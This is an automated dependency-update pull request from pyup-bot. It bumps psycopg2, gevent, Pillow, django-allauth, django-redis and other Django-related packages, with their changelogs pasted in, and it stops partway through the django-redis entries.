Scheduled weekly dependency update for week 06

[pyup-bot]

Update psycopg2 from 2.8.6 to 2.9.3.

Changelog

2.9.3

^^^^^^^^^^^^^^^^^^^^^^^^^^^

- Alpine (musl) wheels now available (:ticket:`1148`).

2.9.2

^^^^^^^^^^^^^^^^^^^^^^^^^^^

- Raise `ValueError` for dates >= Y10k (:ticket:`1307`).
- `~psycopg2.errorcodes` map and `~psycopg2.errors` classes updated to
PostgreSQL 14.
- Add preliminary support for Python 3.11 (:tickets:`1376, 1386`).
- Wheel package compiled against OpenSSL 1.1.1l and PostgreSQL 14.1
(:ticket:`1388`).

2.9.1

^^^^^^^^^^^^^^^^^^^^^^^^^^^

Fix regression with named `sql.Placeholder` (:ticket:`1291`).

2.9

-------------------------

- ``with connection`` starts a transaction on autocommit transactions too
(:ticket:`941`).
- Timezones with fractional minutes are supported on Python 3.7 and following
(:ticket:`1272`).
- Escape table and column names in `~cursor.copy_from()` and
`~cursor.copy_to()`.
- Connection exceptions with sqlstate ``08XXX`` reclassified as
`~psycopg2.OperationalError` (a subclass of the previously used
`~psycopg2.DatabaseError`) (:ticket:`1148`).
- Include library dirs required from libpq to work around MacOS build problems
(:ticket:`1200`).

Other changes:

- Dropped support for Python 2.7, 3.4, 3.5 (:tickets:`1198, 1000, 1197`).
- Dropped support for mx.DateTime.
- Use `datetime.timezone` objects by default in datetime objects instead of
`~psycopg2.tz.FixedOffsetTimezone`.
- The `psycopg2.tz` module is deprecated and scheduled to be dropped in the
next major release.
- Provide :pep:`599` wheels packages (manylinux2014 tag) for i686 and x86_64
platforms.
- Provide :pep:`600` wheels packages (manylinux_2_24 tag) for aarch64 and
ppc64le platforms.
- Wheel package compiled against OpenSSL 1.1.1k and PostgreSQL 13.3.
- Build system for Linux/MacOS binary packages moved to GitHub Actions.

2.8.7

^^^^^^^^^^^^^^^^^^^^^^^^^^^

- Accept empty params as `~psycopg2.connect()` (:ticket:`1250`).
- Fix attributes refcount in `Column` initialisation (:ticket:`1252`).
- Allow re-initialisation of static variables in the C module (:ticket:`1267`).

Links

• PyPI: https://pypi.org/project/psycopg2
• Changelog: https://pyup.io/changelogs/psycopg2/
• Homepage: https://psycopg.org/

Update gevent from 21.1.2 to 21.12.0.

Changelog

21.12.0

====================


Features
--------

- Update autoconf files for Apple Silicon Macs. Note that while there
are reports of compiling gevent on Apple Silicon Macs now, this is
*not* a tested configuration. There may be some remaining issues with
CFFI on some systems as well.
See :issue:`1721`.
- Build and upload CPython 3.10 binary manylinux wheels.

Unfortunately, this required us to stop building and uploading CPython
2.7 binary manylinux wheels. Binary wheels for 2.7 continue to be
available for Windows and macOS.
See :issue:`1822`.
- Test and distribute musllinux_1_1 wheels.
See :issue:`1837`.
- Update the tested versions of PyPy2 and PyPy3. For PyPy2, there should
be no user visible changes, but for PyPy3, support has moved from
Python 3.6 to Python 3.7.
See :issue:`1843`.


Bugfixes
--------

- Try to avoid linking to two different Python runtime DLLs on Windows.
See :issue:`1814`.
- Stop compiling manylinux wheels with ``-ffast-math.`` This was
implicit in ``-Ofast``, but could alter the global state of the
process. Analysis and fix thanks to Ilya Konstantinov.
See :issue:`1820`.
- Fix hanging the interpreter on shutdown if gevent monkey patching
occurred on a non-main thread in Python 3.9.8 and above. (Note that
this is not a recommended practice.)
See :issue:`1839`.


----

21.8.0

===================


Features
--------

- Update the embedded c-ares from 1.16.1 to 1.17.1.
See :issue:`1758`.
- Add support for Python 3.10rc1 and newer.

As part of this, the minimum required greenlet version was increased
to 1.1.0 (on CPython), and the minimum version of Cython needed to
build gevent from a source checkout is 3.0a9.

Note that the dnspython resolver is not available on Python 3.10.
See :issue:`1790`.
- Update from Cython 3.0a6 to 3.0a9.
See :issue:`1801`.


Misc
----

- See :issue:`1789`.


----

Links

• PyPI: https://pypi.org/project/gevent
• Changelog: https://pyup.io/changelogs/gevent/
• Homepage: http://www.gevent.org/

Update django-environ from 0.4.5 to 0.8.1.

Changelog

0.8.1

Fixed
+++++
- Fixed "Invalid line" spam logs on blank lines in env file
`340 <https://github.com/joke2k/django-environ/issues/340>`_.
- Fixed ``memcache``/``pymemcache`` URL parsing for correct identification of
connection type `337 <https://github.com/joke2k/django-environ/issues/337>`_.

0.8.0

------------------------------
Added
+++++
- Log invalid lines when parse .env file
`283 <https://github.com/joke2k/django-environ/pull/283>`_.
- Added docker-style file variable support
`189 <https://github.com/joke2k/django-environ/issues/189>`_.
- Added option to override existing variables with ``read_env``
`103 <https://github.com/joke2k/django-environ/issues/103>`_,
`249 <https://github.com/joke2k/django-environ/issues/249>`_.
- Added support for empty var with None default value
`209 <https://github.com/joke2k/django-environ/issues/209>`_.
- Added ``pymemcache`` cache backend for Django 3.2+
`335 <https://github.com/joke2k/django-environ/pull/335>`_.


Fixed
+++++
- Keep newline/tab escapes in quoted strings
`296 <https://github.com/joke2k/django-environ/pull/296>`_.
- Handle escaped dollar sign in values
`271 <https://github.com/joke2k/django-environ/issues/271>`_.
- Fixed incorrect parsing of ``DATABASES_URL`` for Google Cloud MySQL
`294 <https://github.com/joke2k/django-environ/issues/294>`_.

0.7.0

------------------------------
Added
+++++
- Added support for negative float strings
`160 <https://github.com/joke2k/django-environ/issues/160>`_.
- Added Elasticsearch5 to search scheme
`297 <https://github.com/joke2k/django-environ/pull/297>`_.
- Added Elasticsearch7 to search scheme
`314 <https://github.com/joke2k/django-environ/issues/314>`_.
- Added the ability to use ``bytes`` or ``str`` as a default value for ``Env.bytes()``.

Fixed
+++++
- Fixed links in the documentation.
- Use default option in ``Env.bytes()``
`206 <https://github.com/joke2k/django-environ/pull/206>`_.
- Safely evaluate a string containing an invalid Python literal
`200 <https://github.com/joke2k/django-environ/issues/200>`_.

Changed
+++++++
- Added 'Funding' and 'Say Thanks!' project urls on pypi.
- Stop raising ``UserWarning`` if ``.env`` file isn't found. Log a message with
``INFO`` log level instead `243 <https://github.com/joke2k/django-environ/issues/243>`_.

0.6.0

----------------------------
Added
+++++
- Python 3.9, 3.10 and pypy 3.7 are now supported.
- Django 3.1 and 3.2 are now supported.
- Added missed classifiers to ``setup.py``.
- Accept Python 3.6 path-like objects for ``read_env``
`106 <https://github.com/joke2k/django-environ/issues/106>`_,
`286 <https://github.com/joke2k/django-environ/issues/286>`_.

Fixed
+++++
- Fixed various code linting errors.
- Fixed typos in the documentation.
- Added missed files to the package contents.
- Fixed ``db_url_config`` to work the same for all postgres-like schemes
`264 <https://github.com/joke2k/django-environ/issues/264>`_,
`268 <https://github.com/joke2k/django-environ/issues/268>`_.

Changed
+++++++
- Refactor tests to use pytest and follow DRY.
- Moved CI to GitHub Actions.
- Restructuring of project documentation.
- Build and test package documentation as a part of CI pipeline.
- Build and test package distribution as a part of CI pipeline.
- Check ``MANIFEST.in`` in a source package for completeness as a part of CI
pipeline.
- Added ``pytest`` and ``coverage[toml]`` to setuptools' ``extras_require``.

0.5.0

--------------------------
Added
+++++
- Support for Django 2.1 & 2.2.
- Added tox.ini targets.
- Added secure redis backend URLs via ``rediss://``.
- Add ``cast=str`` to ``str()`` method.

Fixed
+++++
- Fixed misspelling in the documentation.

Changed
+++++++
- Validate empty cache url and invalid cache schema.
- Set ``long_description_content_type`` in setup.
- Improved Django 1.11 database configuration support.

Links

• PyPI: https://pypi.org/project/django-environ
• Changelog: https://pyup.io/changelogs/django-environ/
• Docs: https://django-environ.readthedocs.org

Update whitenoise from 5.2.0 to 5.3.0.

Changelog

5.3.0

------
* Gracefully handle unparsable If-Modified-Since headers (thanks
`danielegozzi <https://github.com/danielegozzi>`_).
* Test against Django 3.2 (thanks `jhnbkr <https://github.com/jhnbkr>`_).
* Add mimetype for Markdown (``.md``) files (thanks `bz2
<https://github.com/bz2>`_).
* Various documentation improvements (thanks `PeterJCLaw
<https://github.com/PeterJCLaw>`_ and `AliRn76
<https://github.com/AliRn76>`_).

Links

• PyPI: https://pypi.org/project/whitenoise
• Changelog: https://pyup.io/changelogs/whitenoise/
• Homepage: https://whitenoise.evans.io

Update django-storages from 1.11.1 to 1.12.3.

Changelog

1.12.3

*******************

General
-------

- Add support for Python 3.10 (`1078`_)

S3
--

- Re-raise non-404 errors in ``.exists()`` (`1084`_, `1085`_)

Azure
-----

- Fix using ``AZURE_CUSTOM_DOMAIN`` with an account key credential (`1082`_, `1083`_)

SFTP
----

- Catch ``FileNotFoundError`` instead of ``OSerror`` in ``.exists()`` to prevent swallowing ``socket.timeout`` exceptions (`1064`_, `1087`_)


.. _1078: https://github.com/jschneier/django-storages/pull/1078
.. _1084: https://github.com/jschneier/django-storages/issues/1084
.. _1085: https://github.com/jschneier/django-storages/pull/1085
.. _1082: https://github.com/jschneier/django-storages/issues/1082
.. _1083: https://github.com/jschneier/django-storages/pull/1083
.. _1064: https://github.com/jschneier/django-storages/issues/1064
.. _1087: https://github.com/jschneier/django-storages/pull/1087

1.12.2

*******************

Azure
-----

- Add ``parameters`` kwarg to ``AzureStorage.url`` to configure blob properties in the SAS token (`1071`_)
- Fix regression where ``AZURE_CUSTOM_DOMAIN`` was interpreted as a replacement of ``blob.core.windows.net`` rather than as a full domain
(`1073`_, `1076`_)

.. _1071: https://github.com/jschneier/django-storages/pull/1071
.. _1073: https://github.com/jschneier/django-storages/issues/1073
.. _1076: https://github.com/jschneier/django-storages/pull/1076

1.12.1

*******************

S3
--

- Change gzip compression to use a streaming implementation (`1061`_)
- Fix saving files with ``S3ManifestStaticStorage`` (`1068`_, `1069`_)

.. _1061: https://github.com/jschneier/django-storages/pull/1061
.. _1068: https://github.com/jschneier/django-storages/issues/1068
.. _1069: https://github.com/jschneier/django-storages/pull/1069

1.12

*****************

General
-------
- Add support for Django 3.2 (`1046`_, `1042`_, `1005`_)
- Replace Travis CI with GitHub actions (`1051`_)

S3
--

- Convert signing keys to bytes if necessary (`1003`_)
- Avoid a ListParts API call during multipart upload (`1041`_)
- Custom domains now use passed URL params (`1054`_)
- Allow the use of AWS profiles and clarify the options for passing credentials (`fbe9538`_)
- Re-allow override of various access key names (`1026`_)
- Properly exclude empty folders during ``listdir`` (`66f4f8e`_)
- Support saving file objects that are not ``seekable`` (`860`_, `1057`_)
- Return ``True`` for ``.exists()`` if a non-404 error is encountered (`938`_)

Azure
-----

- **Breaking**: This backend has been rewritten to use the newer versions of ``azure-storage-blob``, which now has a minimum required version of 12.0. The settings ``AZURE_EMULATED_MODE``, ``AZURE_ENDPOINT_SUFFIX``, and ``AZURE_CUSTOM_CONNECTION_STRING`` are now ignored. (`784`_, `805`_)
- Add support for user delegation keys (`1063`_)

Google Cloud
------------

- **Breaking**: The minimum required version of ``google-cloud-storage`` is now 1.27.0 (`994`_)
- **Breaking**: Switch URL signing version from v2 to v4 (`994`_)
- **Deprecated**: Support for ``GS_CACHE_CONTROL`` will be removed in 1.13. Please set the ``cache_control`` parameter of ``GS_OBJECT_PARAMETERS`` instead. (`970`_)
- Add ``GS_OBJECT_PARAMETERS`` and overridable ``GoogleCloudStorage.get_object_parameters`` to customize blob parameters for all blobs and per-blob respectively. (`970`_)
- Catch the ``NotFound`` exception raised when deleting a non-existent blob, this matches Django and other backends (`998`_, `999`_)
- Fix signing URLs with custom endpoints (`994`_)

Dropbox
-------

- Validate ``write_mode`` param (`1020`_)

.. _fbe9538: https://github.com/jschneier/django-storages/commit/fbe9538b8574cfb0d95b04c9c477650dbfe8547b
.. _66f4f8e: https://github.com/jschneier/django-storages/commit/66f4f8ec68daaac767c013d6b1a30cf26a7ac1ca
.. _1003: https://github.com/jschneier/django-storages/pull/1003
.. _1054: https://github.com/jschneier/django-storages/pull/1054
.. _1026: https://github.com/jschneier/django-storages/pull/1026
.. _1041: https://github.com/jschneier/django-storages/pull/1041
.. _970: https://github.com/jschneier/django-storages/pull/970
.. _998: https://github.com/jschneier/django-storages/issues/998
.. _784: https://github.com/jschneier/django-storages/issues/784
.. _805: https://github.com/jschneier/django-storages/pull/805
.. _999: https://github.com/jschneier/django-storages/pull/999
.. _1051: https://github.com/jschneier/django-storages/pull/1051
.. _1042: https://github.com/jschneier/django-storages/pull/1042
.. _1046: https://github.com/jschneier/django-storages/issues/1046
.. _1005: https://github.com/jschneier/django-storages/pull/1005
.. _1020: https://github.com/jschneier/django-storages/pull/1020
.. _860: https://github.com/jschneier/django-storages/issues/860
.. _1057: https://github.com/jschneier/django-storages/pull/1057
.. _938: https://github.com/jschneier/django-storages/pull/938
.. _994: https://github.com/jschneier/django-storages/pull/994
.. _1063: https://github.com/jschneier/django-storages/pull/1063

Links

• PyPI: https://pypi.org/project/django-storages
• Changelog: https://pyup.io/changelogs/django-storages/
• Repo: https://github.com/jschneier/django-storages

Update django-anymail from 8.3 to 8.5.

Changelog

8.5

----

*2022-01-19*

Fixes
~~~~~

* Allow `attach_alternative("content", "text/plain")` in place of setting
an EmailMessage's `body`, and generally improve alternative part
handling for consistency with Django's SMTP EmailBackend.
(Thanks to `cjsoftuk`_ for reporting the issue.)

* Remove "sending a message from *sender* to *recipient*" from `AnymailError`
text, as this can unintentionally leak personal information into logs.
[Note that `AnymailError` *does* still include any error description
from your ESP, and this often contains email addresses and other content
from the sent message. If this is a concern, you can adjust Django's logging
config to limit collection from Anymail or implement custom PII filtering.]
(Thanks to `coupa-anya`_ for reporting the issue.)


Other
~~~~~

* **Postmark:** Document limitation on `track_opens` overriding Postmark's
server-level setting. (See
`docs <https://anymail.readthedocs.io/en/stable/esps/postmark/#limitations-and-quirks>`__.)

* Expand `testing documentation <https://anymail.readthedocs.io/en/stable/tips/testing/>`__
to cover tracking events and inbound handling, and to clarify test EmailBackend behavior.

* In Anymail's test EmailBackend, add `is_batch_send` boolean to `anymail_test_params`
to help tests check whether a sent message would fall under Anymail's batch-send logic.

8.4

----

*2021-06-15*

Features
~~~~~~~~

* **Postal:** Add support for this self-hosted ESP
(`docs <https://anymail.readthedocs.io/en/stable/esps/postal>`__).
Thanks to `tiltec`_ for researching, implementing, testing and
documenting Postal support.

Links

• PyPI: https://pypi.org/project/django-anymail
• Changelog: https://pyup.io/changelogs/django-anymail/
• Repo: https://github.com/anymail/django-anymail

Update wheel from 0.36.2 to 0.37.1.

Changelog

0.37.1

- Fixed ``wheel pack`` duplicating the ``WHEEL`` contents when the build number has changed (415)
- Fixed parsing of file names containing commas in ``RECORD`` (PR by Hood Chatham)

0.37.0

- Added official Python 3.10 support
- Updated vendored ``packaging`` library to v20.9

Links

• PyPI: https://pypi.org/project/wheel
• Changelog: https://pyup.io/changelogs/wheel/
• Repo: https://github.com/pypa/wheel

Update django-braces from 1.14.0 to 1.15.0.

Changelog

1.15.0

* :support:`-` Formatted project with black
* :support:`-` Updated README
* :feature:`265` Drop old Python and Django versions, bring in newer ones

Links

• PyPI: https://pypi.org/project/django-braces
• Changelog: https://pyup.io/changelogs/django-braces/
• Repo: https://github.com/brack3t/django-braces/

Update django-crispy-forms from 1.11.2 to 1.14.0.

Changelog

1.14.0

* Added support for Python 3.10
* Dropped support for Django 3.1
* Dropped support for Python 3.6
* Added bootstrap modal layout object (1204)
* Added `input_size` argument to `FieldWithButtons` to allow customisation of the size of the input in the Bootstrap 4 
template pack. (1159)

See the [1.14.0 Milestone](https://github.com/django-crispy-forms/django-crispy-forms/milestone/18?closed=1) for the full change list.

1.13.0

* Added support for Django 4.0

1.12.0

* Fixed rendering of grouped checkboxes and radio inputs in the Bootstrap 4 template pack. (1155)
* Introduced new `input_size` argument to `AppendedText`, `PrependedText` and `PrependedAppendedText`. This allows
the size of these grouped inputs to be changed in the Bootstrap 4 template pack. (1114)
* Confirmed support for Django 3.2
* Dropped support for Python 3.5
* Dropped support for Django 3.0

See the [1.12.0 Milestone](https://github.com/django-crispy-forms/django-crispy-forms/milestone/16?closed=1) for the full change list.

Links

• PyPI: https://pypi.org/project/django-crispy-forms
• Changelog: https://pyup.io/changelogs/django-crispy-forms/
• Repo: https://github.com/django-crispy-forms/django-crispy-forms

Update django-model-utils from 4.1.1 to 4.2.0.

Changelog

4.2.0

------------------

- Add support for `Django 3.2`
- Drop support for `Django 3.0`
- Add support for `Python 3.10`
- Added urlsafe token field.
- Introduce context manager for FieldTracker state reset (GH-491)
- Fix performance regression of FieldTracker on FileField subclasses on Django 3.1+
(GH-498)

Links

• PyPI: https://pypi.org/project/django-model-utils
• Changelog: https://pyup.io/changelogs/django-model-utils/
• Repo: https://github.com/jazzband/django-model-utils

Update Pillow from 8.2.0 to 9.0.1.

Changelog

9.0.1

------------------

- In show_file, use os.remove to remove temporary images. CVE-2022-24303 6010
[radarhere, hugovk]

- Restrict builtins within lambdas for ImageMath.eval. CVE-2022-22817 6009
[radarhere]

9.0.0

------------------

- Restrict builtins for ImageMath.eval(). CVE-2022-22817 5923
[radarhere]

- Ensure JpegImagePlugin stops at the end of a truncated file 5921
[radarhere]

- Fixed ImagePath.Path array handling. CVE-2022-22815, CVE-2022-22816 5920
[radarhere]

- Remove consecutive duplicate tiles that only differ by their offset 5919
[radarhere]

- Improved I;16 operations on big endian 5901
[radarhere]

- Limit quantized palette to number of colors 5879
[radarhere]

- Fixed palette index for zeroed color in FASTOCTREE quantize 5869
[radarhere]

- When saving RGBA to GIF, make use of first transparent palette entry 5859
[radarhere]

- Pass SAMPLEFORMAT to libtiff 5848
[radarhere]

- Added rounding when converting P and PA 5824
[radarhere]

- Improved putdata() documentation and data handling 5910
[radarhere]

- Exclude carriage return in PDF regex to help prevent ReDoS 5912
[hugovk]

- Fixed freeing pointer in ImageDraw.Outline.transform 5909
[radarhere]

- Added ImageShow support for xdg-open 5897
[m-shinder, radarhere]

- Support 16-bit grayscale ImageQt conversion 5856
[cmbruns, radarhere]

- Convert subsequent GIF frames to RGB or RGBA 5857
[radarhere]

- Do not prematurely return in ImageFile when saving to stdout 5665
[infmagic2047, radarhere]

- Added support for top right and bottom right TGA orientations 5829
[radarhere]

- Corrected ICNS file length in header 5845
[radarhere]

- Block tile TIFF tags when saving 5839
[radarhere]

- Added line width argument to polygon 5694
[radarhere]

- Do not redeclare class each time when converting to NumPy 5844
[radarhere]

- Only prevent repeated polygon pixels when drawing with transparency 5835
[radarhere]

- Add support for pickling TrueType fonts 5826
[hugovk, radarhere]

- Only prefer command line tools SDK on macOS over default MacOSX SDK 5828
[radarhere]

- Drop support for soon-EOL Python 3.6 5768
[hugovk, nulano, radarhere]

- Fix compilation on 64-bit Termux 5793
[landfillbaby]

- Use title for display in ImageShow 5788
[radarhere]

- Remove support for FreeType 2.7 and older 5777
[hugovk, radarhere]

- Fix for PyQt6 5775
[hugovk, radarhere]

- Removed deprecated PILLOW_VERSION, Image.show command parameter, Image._showxv and ImageFile.raise_ioerror 5776
[radarhere]

8.4.0

------------------

- Prefer global transparency in GIF when replacing with background color 5756
[radarhere]

- Added "exif" keyword argument to TIFF saving 5575
[radarhere]

- Copy Python palette to new image in quantize() 5696
[radarhere]

- Read ICO AND mask from end 5667
[radarhere]

- Actually check the framesize in FliDecode.c 5659
[wiredfool]

- Determine JPEG2000 mode purely from ihdr header box 5654
[radarhere]

- Fixed using info dictionary when writing multiple APNG frames 5611
[radarhere]

- Allow saving 1 and L mode TIFF with PhotometricInterpretation 0 5655
[radarhere]

- For GIF save_all with palette, do not include palette with each frame 5603
[radarhere]

- Keep transparency when converting from P to LA or PA 5606
[radarhere]

- Copy palette to new image in transform() 5647
[radarhere]

- Added "transparency" argument to EpsImagePlugin load() 5620
[radarhere]

- Corrected pathlib.Path detection when saving 5633
[radarhere]

- Added WalImageFile class 5618
[radarhere]

- Consider I;16 pixel size when drawing text 5598
[radarhere]

- If default conversion from P is RGB with transparency, convert to RGBA 5594
[radarhere]

- Speed up rotating square images by 90 or 270 degrees 5646
[radarhere]

- Add support for reading DPI information from JPEG2000 images
[rogermb, radarhere]

- Catch TypeError from corrupted DPI value in EXIF 5639
[homm, radarhere]

- Do not close file pointer when saving SGI images 5645
[farizrahman4u, radarhere]

- Deprecate ImagePalette size parameter 5641
[radarhere, hugovk]

- Prefer command line tools SDK on macOS 5624
[radarhere]

- Added tags when saving YCbCr TIFF 5597
[radarhere]

- PSD layer count may be negative 5613
[radarhere]

- Fixed ImageOps expand with tuple border on P image 5615
[radarhere]

- Fixed error saving APNG with duplicate frames and different duration times 5609
[thak1411, radarhere]

8.3.2

------------------

- CVE-2021-23437 Raise ValueError if color specifier is too long
[hugovk, radarhere]

- Fix 6-byte OOB read in FliDecode
[wiredfool]

- Add support for Python 3.10 5569, 5570
[hugovk, radarhere]

- Ensure TIFF ``RowsPerStrip`` is multiple of 8 for JPEG compression 5588
[kmilos, radarhere]

- Updates for ``ImagePalette`` channel order 5599
[radarhere]

- Hide FriBiDi shim symbols to avoid conflict with real FriBiDi library 5651
[nulano]

8.3.1

------------------

- Catch OSError when checking if fp is sys.stdout 5585
[radarhere]

- Handle removing orientation from alternate types of EXIF data 5584
[radarhere]

- Make Image.__array__ take optional dtype argument 5572
[t-vi, radarhere]

8.3.0

------------------

- Use snprintf instead of sprintf. CVE-2021-34552 5567
[radarhere]

- Limit TIFF strip size when saving with LibTIFF 5514
[kmilos]

- Allow ICNS save on all operating systems 4526
[baletu, radarhere, newpanjing, hugovk]

- De-zigzag JPEG's DQT when loading; deprecate convert_dict_qtables 4989
[gofr, radarhere]

- Replaced xml.etree.ElementTree 5565
[radarhere]

- Moved CVE image to pillow-depends 5561
[radarhere]

- Added tag data for IFD groups 5554
[radarhere]

- Improved ImagePalette 5552
[radarhere]

- Add DDS saving 5402
[radarhere]

- Improved getxmp() 5455
[radarhere]

- Convert to float for comparison with float in IFDRational __eq__ 5412
[radarhere]

- Allow getexif() to access TIFF tag_v2 data 5416
[radarhere]

- Read FITS image mode and size 5405
[radarhere]

- Merge parallel horizontal edges in ImagingDrawPolygon 5347
[radarhere, hrdrq]

- Use transparency behind first GIF frame and when disposing to background 5557
[radarhere, zewt]

- Avoid unstable nature of qsort in Quant.c 5367
[radarhere]

- Copy palette to new images in ImageOps expand 5551
[radarhere]

- Ensure palette string matches RGB mode 5549
[radarhere]

- Do not modify EXIF of original image instance in exif_transpose() 5547
[radarhere]

- Fixed default numresolution for small JPEG2000 images 5540
[radarhere]

- Added DDS BC5 reading 5501
[radarhere]

- Raise an error if ImageDraw.textbbox is used without a TrueType font 5510
[radarhere]

- Added ICO saving in BMP format 5513
[radarhere]

- Ensure PNG seeks to end of previous chunk at start of load_end 5493
[radarhere]

- Do not allow TIFF to seek to a past frame 5473
[radarhere]

- Avoid race condition when displaying images with eog 5507
[mconst]

- Added specific error messages when ink has incorrect number of bands 5504
[radarhere]

- Allow converting an image to a numpy array to raise errors 5379
[radarhere]

- Removed DPI rounding from BMP, JPEG, PNG and WMF loading 5476, 5470
[radarhere]

- Remove spikes when drawing thin pieslices 5460
[xtsm]

- Updated default value for SAMPLESPERPIXEL TIFF tag 5452
[radarhere]

- Removed TIFF DPI rounding 5446
[radarhere, hugovk]

- Include code in WebP error 5471
[radarhere]

- Do not alter pixels outside mask when drawing text on an image with transparency 5434
[radarhere]

- Reset handle when seeking backwards in TIFF 5443
[radarhere]

- Replace sys.stdout with sys.stdout.buffer when saving 5437
[radarhere]

- Fixed UNDEFINED TIFF tag of length 0 being changed in roundtrip 5426
[radarhere]

- Fixed bug when checking FreeType2 version if it is not installed 5445
[radarhere]

- Do not round dimensions when saving PDF 5459
[radarhere]

- Added ImageOps contain() 5417
[radarhere, hugovk]

- Changed WebP default "method" value to 4 5450
[radarhere]

- Switched to saving 1-bit PDFs with DCTDecode 5430
[radarhere]

- Use bpp from ICO header 5429
[radarhere]

- Corrected JPEG APP14 transform value 5408
[radarhere]

- Changed TIFF tag 33723 length to 1 5425
[radarhere]

- Changed ImageMorph incorrect mode errors to ValueError 5414
[radarhere]

- Add EXIF tags specified in EXIF 2.32 5419
[gladiusglad]

- Treat previous contents of first GIF frame as transparent 5391
[radarhere]

- For special image modes, revert default resize resampling to NEAREST 5411
[radarhere]

- JPEG2000: Support decoding subsampled RGB and YCbCr images 4996
[nulano, radarhere]

- Stop decoding BC1 punchthrough alpha in BC2&3 4144
[jansol]

- Use zero if GIF background color index is missing 5390
[radarhere]

- Fixed ensuring that GIF previous frame was loaded 5386
[radarhere]

- Valgrind fixes 5397
[wiredfool]

- Round down the radius in rounded_rectangle 5382
[radarhere]

- Fixed reading uncompressed RGB data from DDS 5383
[radarhere]

Links

• PyPI: https://pypi.org/project/pillow
• Changelog: https://pyup.io/changelogs/pillow/
• Homepage: https://python-pillow.org

Update argon2-cffi from 20.1.0 to 21.3.0.

The bot wasn't able to find a changelog for this release. Got an idea?

Links

• PyPI: https://pypi.org/project/argon2-cffi

Update django-allauth from 0.44.0 to 0.48.0.

Changelog

0.48.0

*******************

Note worthy changes
-------------------
- New translations: Catalan, Bulgarian.

- Introduced a new setting ``ACCOUNT_PREVENT_ENUMERATION`` that controls whether
or not information is revealed about whether or not a user account exists.
**Warning**: this is a work in progress, password reset is covered, yet,
signing up is not.

- The ``ACCOUNT_EMAIL_CONFIRMATION_COOLDOWN`` is now also respected when using
HMAC based email confirmations. In earlier versions, users could trigger email
verification mails without any limits.

- Added builtin rate limitting (see ``ACCOUNT_RATE_LIMITS``).

- Added ``reset_url_token`` attribute in
``allauth.account.views.PasswordResetFromKeyView`` which allows specifying
a token parameter displayed as a component of password reset URLs.

- It is now possible to use allauth without having ``sites`` installed. Whether or
not sites is used affects the data models. For example, the social app model
uses a many-to-many pointing to the sites model if the ``sites`` app is
installed. Therefore, enabling or disabling ``sites`` is not something you can
do on the fly.

- The ``facebook`` provider no longer raises ``ImproperlyConfigured``
within ``{% providers_media_js %}`` when it is not configured.



Backwards incompatible changes
------------------------------

- The newly introduced ``ACCOUNT_PREVENT_ENUMERATION`` defaults to ``True`` impacting
the current behavior of the password reset flow.

- The newly introduced rate limitting is by default turned on. You will need to provide
a ``429.html`` template.

- The default of ``SOCIALACCOUNT_STORE_TOKENS`` has been changed to
``False``. Rationale is that storing sensitive information should be opt in, not
opt out. If you were relying on this functionality without having it
explicitly turned on, please add it to your ``settings.py``.

0.47.0

*******************

Note worthy changes
-------------------

- New providers: Gumroad.


Backwards incompatible changes
------------------------------

- Added a new setting ``SOCIALACCOUNT_LOGIN_ON_GET`` that controls whether or not
the endpoints for initiating a social login (for example,
"/accounts/google/login/") require a POST request to initiate the
handshake. As requiring a POST is more secure, the default of this new setting
is ``False``.


Security notice
---------------

Automatically signing in users into their account and connecting additional
third party accounts via a simple redirect ("/accounts/facebook/login/") can
lead to unexpected results and become a security issue especially when the
redirect is triggered from a malicious web site. For example, if an attacker
prepares a malicious website that (ab)uses the Facebook password recovery
mechanism to first sign into his/her own Facebook account, followed by a
redirect to connect a new social account, you may end up with the attacker's
Facebook account added to the account of the victim. To mitigate this,
``SOCIALACCOUNT_LOGIN_ON_GET`` is introduced.

0.46.0

*******************

Note worthy changes
-------------------

- New providers: Gitea, MediaWiki.

- New translations: Georgian, Mongolian.

- Django 3.2 compatibility.

0.45.0

*******************


Note worthy changes
-------------------

- New providers: Feishu, NetIQ, Frontier, CILogin.

Links

• PyPI: https://pypi.org/project/django-allauth
• Changelog: https://pyup.io/changelogs/django-allauth/
• Homepage: http://www.intenct.nl/projects/django-allauth/

Update pytz from 2021.1 to 2021.3.

The bot wasn't able to find a changelog for this release. Got an idea?

Links

• PyPI: https://pypi.org/project/pytz
• Homepage: http://pythonhosted.org/pytz
• Docs: https://pythonhosted.org/pytz/

Update django-redis from 4.12.1 to 5.2.0.

Changelog

5.2.0

===============================

Bug Fixes
---------

- Block use with broken redis-py 4.0.0 and 4.0.1 (`542 <https://github.com/jazzband/django-redis/issues/542>`_)


Miscellaneous
-------------

- Unblock redis-py >=4.0.2 (`576 <https://github.com/jazzband/django-redis/issues/576>`_)
- Add support for django 4 (`579 <https://github.com/jazzband/django-redis/issues/579>`_)

5.1.0

===============================

Features
--------

- Add Python 3.10 to CI (`536 <https://github.com/jazzband/django-redis/issues/536>`_)
- Configured ``towncrier`` to generate the changelog. (`548 <https://github.com/jazzband/django-redis/issues/548>`_)
- Added ``django_redis.compressors.zstd.ZStdCompressor`` to provide ``pyzstd`` cache value compression. (`551 <https://github.com/jazzband/django-redis/issues/551>`_)
- Change pickle default version to Python default instead of highest version. (`555 <https://github.com/jazzband/django-redis/issues/555>`_)
- Add ``hiredis`` extra dependency to request ``redis[hiredis]``. (`556 <https://github.com/jazzband/django-redis/issues/556>`_)
